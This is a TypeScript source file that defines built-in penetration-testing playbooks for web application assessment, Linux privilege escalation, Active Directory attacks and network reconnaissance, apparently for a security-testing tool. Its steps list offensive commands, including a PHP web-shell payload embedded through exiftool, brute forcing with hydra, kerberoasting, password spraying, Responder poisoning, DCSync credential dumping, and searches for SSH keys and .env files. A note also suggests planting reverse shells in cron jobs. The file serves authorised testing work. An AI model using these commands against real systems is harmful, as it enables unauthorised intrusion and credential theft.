import type { Playbook, PlaybookStep } from './types'

function step(
  id: string,
  order: number,
  title: string,
  description: string,
  category: PlaybookStep['category'],
  commands: string[],
  notes: string,
  required = true
): PlaybookStep {
  return { id, order, title, description, category, commands, notes, required }
}

const NOW = '2025-01-01T00:00:00.000Z'

export const BUILTIN_PLAYBOOKS: Playbook[] = [
  {
    id: 'builtin-web-app',
    name: 'Web Application Assessment',
    description: 'Comprehensive methodology for assessing web application security.',
    category: 'web-app',
    tags: ['web', 'owasp', 'burp'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    steps: [
      step('wa-1', 1, 'Passive Recon', 'Gather information without directly interacting with the target. Use OSINT tools, Shodan, Google dorks, and certificate transparency logs.', 'recon',
        ['whois target.com', 'subfinder -d target.com', 'amass enum -passive -d target.com', 'theHarvester -d target.com -b all'],
        'Check for exposed S3 buckets, leaked credentials in GitHub, LinkedIn employee data.'),
      step('wa-2', 2, 'Active Recon (nmap)', 'Port scan the target to identify running services and open ports.', 'recon',
        ['nmap -sV -sC -oN nmap_initial.txt <IP>', 'nmap -p- --min-rate 5000 -oN nmap_allports.txt <IP>'],
        'Note all web services and their versions. Check for unusual ports.'),
      step('wa-3', 3, 'Directory Enumeration', 'Brute-force directories and files to discover hidden content.', 'enum',
        ['ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ', 'gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt', 'feroxbuster -u https://target.com'],
        'Also enumerate with extensions: .php .asp .aspx .bak .old .zip'),
      step('wa-4', 4, 'Technology Fingerprinting', 'Identify the tech stack, frameworks, CMS, and libraries in use.', 'recon',
        ['whatweb https://target.com', 'wappalyzer (browser extension)', 'curl -I https://target.com'],
        'Check headers (X-Powered-By, Server), cookies, HTML comments, and JS bundle names.'),
      step('wa-5', 5, 'Authentication Testing', 'Test login mechanisms for common weaknesses: default creds, lockout bypass, username enumeration.', 'exploit',
        ['hydra -L users.txt -P pass.txt https-post-form "/login:user=^USER^&pass=^PASS^:Invalid"'],
        'Test: default credentials, no lockout, username enumeration via timing/response, password reset flaws.'),
      step('wa-6', 6, 'Input Validation Testing (XSS/SQLi/SSTI)', 'Inject payloads into all input fields and parameters to test for injection vulnerabilities.', 'exploit',
        ["sqlmap -u 'https://target.com/page?id=1' --batch", 'dalfox url https://target.com/search?q=test'],
        "Test every user-controlled input: GET/POST params, headers, cookies. Use Burp Intruder for fuzzing."),
      step('wa-7', 7, 'Business Logic Testing', 'Test application-specific workflows for logic flaws that automated tools miss.', 'exploit',
        [],
        'Examples: price manipulation, step skipping in multi-step flows, privilege escalation via parameter tampering, IDOR.', false),
      step('wa-8', 8, 'File Upload Testing', 'Test file upload functionality for bypass of type restrictions and code execution.', 'exploit',
        ['exiftool -Comment="<?php system($_GET[\'cmd\']); ?>" image.jpg'],
        'Try: changing Content-Type, double extensions (.php.jpg), null bytes, magic byte manipulation.'),
      step('wa-9', 9, 'API Endpoint Discovery', 'Identify and test API endpoints for authentication issues, excessive data exposure, and injection.', 'enum',
        ['ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -u https://target.com/api/FUZZ', 'arjun -u https://target.com/api/endpoint'],
        'Check Swagger/OpenAPI docs, JS files for hardcoded endpoints, and test BOLA/BFLA.'),
      step('wa-10', 10, 'Report Generation', 'Document all findings with evidence, CVSS scores, and remediation recommendations.', 'report',
        [],
        'Include: executive summary, findings table, per-finding detail (description, evidence, impact, remediation), appendix.')
    ]
  },
  {
    id: 'builtin-linux-privesc',
    name: 'Linux Privilege Escalation',
    description: 'Systematic methodology for escalating privileges on a compromised Linux host.',
    category: 'linux',
    tags: ['linux', 'privesc', 'post-exploitation'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    steps: [
      step('lp-1', 1, 'Initial Enumeration', 'Establish who you are and basic host information.', 'enum',
        ['whoami', 'id', 'hostname', 'uname -a', 'cat /etc/os-release', 'env', 'pwd'],
        'Note your username, groups, and OS version. Groups like docker, lxd, disk are immediate privesc paths.'),
      step('lp-2', 2, 'SUID/GUID Binaries', 'Find binaries with SUID/GUID bit set that may be exploitable.', 'privesc',
        ['find / -perm -u=s -type f 2>/dev/null', 'find / -perm -g=s -type f 2>/dev/null'],
        'Cross-reference results with GTFOBins (gtfobins.github.io) for exploitation methods.'),
      step('lp-3', 3, 'Sudo Permissions', 'Check what commands the current user can run as root via sudo.', 'privesc',
        ['sudo -l', 'sudo -V'],
        'Any binary listed without a password prompt can likely be abused. Check GTFOBins.'),
      step('lp-4', 4, 'Cron Jobs', 'Look for cron jobs running as root that we can manipulate.', 'privesc',
        ['cat /etc/crontab', 'ls -la /etc/cron*', 'cat /var/spool/cron/crontabs/root 2>/dev/null', 'pspy64'],
        'If a cron script is world-writable or calls a world-writable binary, inject a reverse shell.'),
      step('lp-5', 5, 'Writable Files in PATH', 'Find writable directories in the system PATH to plant malicious binaries.', 'privesc',
        ['echo $PATH', "find /usr/local/bin /usr/bin /bin -writable 2>/dev/null"],
        'If a root cron or SUID binary calls a relative path command, create a malicious version in the writable directory.'),
      step('lp-6', 6, 'Kernel Version Check', 'Check kernel version against known privilege escalation exploits.', 'privesc',
        ['uname -r', 'searchsploit linux kernel $(uname -r)'],
        'Notable exploits: DirtyCow (2.6.22-3.9), Overlayfs, DirtyPipe (5.8-5.16). Check exploit-db.'),
      step('lp-7', 7, 'Running Services', 'Enumerate running services, especially those bound to localhost only.', 'enum',
        ['ps aux', 'ss -tlnp', 'netstat -tlnp 2>/dev/null'],
        'Services bound to 127.0.0.1 may be exploitable via port forwarding. Check versions for known CVEs.'),
      step('lp-8', 8, 'Network Connections', 'Map active connections and listening services.', 'enum',
        ['ss -anp', 'ip route', 'arp -a', 'cat /etc/hosts'],
        'Identify internal network ranges for lateral movement opportunities.'),
      step('lp-9', 9, 'Sensitive Files Check', 'Search for credentials, keys, and sensitive configuration files.', 'loot',
        ['find / -name "*.conf" -readable 2>/dev/null | head -20', 'find / -name "id_rsa" 2>/dev/null', 'find / -name ".env" 2>/dev/null', 'cat ~/.bash_history'],
        'Also check: /var/www/, /opt/, database configs, .git directories, backup files.'),
      step('lp-10', 10, 'Password Reuse Check', 'Test discovered passwords against system accounts and services.', 'loot',
        ['cat /etc/passwd | grep -v nologin', 'su - <username>'],
        'Check /etc/passwd for users with shells, try reusing any found passwords. Check for readable /etc/shadow.')
    ]
  },
  {
    id: 'builtin-ad-initial',
    name: 'Active Directory Initial Access',
    description: 'Methodology for gaining initial foothold and escalating within an Active Directory environment.',
    category: 'active-directory',
    tags: ['active-directory', 'windows', 'kerberos'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    steps: [
      step('ad-1', 1, 'Network Enumeration', 'Identify domain controllers, subnet ranges, and key hosts.', 'recon',
        ['nmap -sV --script=smb-security-mode,smb-os-discovery -p 445 <subnet>', 'nmap -p 88 <subnet> --open'],
        'Port 88 (Kerberos) and 389 (LDAP) identifies DCs. Port 445 (SMB) identifies domain-joined hosts.'),
      step('ad-2', 2, 'SMB Null Sessions', 'Attempt unauthenticated SMB enumeration to gather domain info.', 'enum',
        ['enum4linux-ng -A <DC-IP>', 'smbclient -L //<DC-IP>/ -N', 'crackmapexec smb <DC-IP> --shares -u "" -p ""'],
        'Null sessions can reveal usernames, groups, shares, and password policy without credentials.'),
      step('ad-3', 3, 'Kerberoasting Check', 'Request TGS tickets for SPNs and crack them offline.', 'exploit',
        ['impacket-GetUserSPNs -request -dc-ip <DC-IP> <DOMAIN>/<USER>:<PASS>', 'hashcat -m 13100 hashes.txt rockyou.txt'],
        'Any service account with an SPN is vulnerable. Prioritize accounts with admin-like names.'),
      step('ad-4', 4, 'Password Spray (Safe Threshold)', 'Spray one password across many accounts to avoid lockouts.', 'exploit',
        ['crackmapexec smb <DC-IP> -u users.txt -p "Password1" --continue-on-success', 'kerbrute passwordspray -d <DOMAIN> --dc <DC-IP> users.txt "Password1"'],
        'Check password policy first (lockout threshold). Stay at least 2 attempts below threshold. Spray only once per hour.'),
      step('ad-5', 5, 'AS-REP Roasting', 'Find accounts with pre-authentication disabled and crack their hashes.', 'exploit',
        ['impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC-IP> -format hashcat', 'hashcat -m 18200 hashes.txt rockyou.txt'],
        'No credentials needed. Users with DONT_REQUIRE_PREAUTH flag set are vulnerable.'),
      step('ad-6', 6, 'LLMNR/NBT-NS Poisoning', 'Poison name resolution broadcasts to capture NTLMv2 hashes.', 'exploit',
        ['responder -I eth0 -rdwv'],
        'Works best on networks with mistyped UNC paths. Hashes can be cracked or relayed. Requires being on the same subnet.'),
      step('ad-7', 7, 'BloodHound Collection', 'Map AD attack paths using BloodHound.', 'enum',
        ['bloodhound-python -u <USER> -p <PASS> -d <DOMAIN> -dc <DC-IP> -c All', 'SharpHound.exe -c All'],
        'Look for shortest path to Domain Admin. Check for ACL abuse paths, unconstrained delegation.'),
      step('ad-8', 8, 'DCSync Check', 'If sufficient privileges, replicate domain credentials via DCSync.', 'post',
        ['impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC-IP>', 'mimikatz "lsadump::dcsync /domain:<DOMAIN> /user:krbtgt"'],
        'Requires DS-Replication permissions. Grants krbtgt hash for Golden Ticket creation.'),
      step('ad-9', 9, 'Report', 'Document the attack path from initial access to domain compromise.', 'report',
        [],
        'Include: initial access vector, privilege escalation chain, lateral movement steps, domain compromise evidence, recommended mitigations.')
    ]
  },
  {
    id: 'builtin-network-recon',
    name: 'Network Recon',
    description: 'Systematic network reconnaissance and service enumeration methodology.',
    category: 'network',
    tags: ['network', 'nmap', 'recon'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    steps: [
      step('nr-1', 1, 'Host Discovery (Ping Sweep)', 'Identify live hosts on the network.', 'recon',
        ['nmap -sn <subnet>', 'fping -a -g <subnet> 2>/dev/null', 'arp-scan --localnet'],
        'Use multiple methods — some hosts block ICMP but respond to ARP. Save live host list to file.'),
      step('nr-2', 2, 'Port Scan (Top 1000)', 'Fast scan of the most common ports across all live hosts.', 'enum',
        ['nmap -sV -sC --top-ports 1000 -oA nmap_top1000 <targets>', 'nmap -T4 -F -oN nmap_fast.txt <targets>'],
        'Get a quick picture of the attack surface before spending time on full scans.'),
      step('nr-3', 3, 'Full Port Scan (All Ports)', 'Scan all 65535 ports to find services on non-standard ports.', 'enum',
        ['nmap -p- --min-rate 5000 -oA nmap_allports <target>', 'masscan -p 1-65535 <target> --rate=10000'],
        'Services often run on non-standard ports. This scan takes longer — run in background.'),
      step('nr-4', 4, 'Service Version Detection', 'Identify exact service versions for CVE research.', 'enum',
        ['nmap -sV -sC -p <open-ports> -oA nmap_versions <target>', 'nmap --script=banner -p <ports> <target>'],
        'Cross-reference versions with searchsploit and NVD. Note any outdated or EOL software.'),
      step('nr-5', 5, 'OS Fingerprinting', 'Determine operating systems running on discovered hosts.', 'recon',
        ['nmap -O --osscan-guess <target>', 'nmap -A -p <ports> <target>'],
        'OS info helps narrow down applicable exploits and misconfigurations.'),
      step('nr-6', 6, 'Vulnerability Scan', 'Run automated vulnerability detection against discovered services.', 'exploit',
        ['nmap --script=vuln -p <ports> <target>', 'nmap --script=smb-vuln* -p 445 <targets>'],
        'Check for: EternalBlue (MS17-010), BlueKeep (MS19-0708), PrintNightmare. Verify findings manually.'),
      step('nr-7', 7, 'Screenshot Web Services', 'Capture screenshots of all web interfaces for visual triage.', 'recon',
        ['gowitness scan --cidr <subnet>', 'aquatone -out screenshots/ < hosts.txt', 'eyewitness --web -f hosts.txt'],
        'Screenshots allow rapid triage of many services. Look for default pages, login portals, dev environments.'),
      step('nr-8', 8, 'Report', 'Compile network map with services, versions, and vulnerability findings.', 'report',
        [],
        'Include: network topology diagram, host inventory table, critical findings, remediation priorities.')
    ]
  }
]
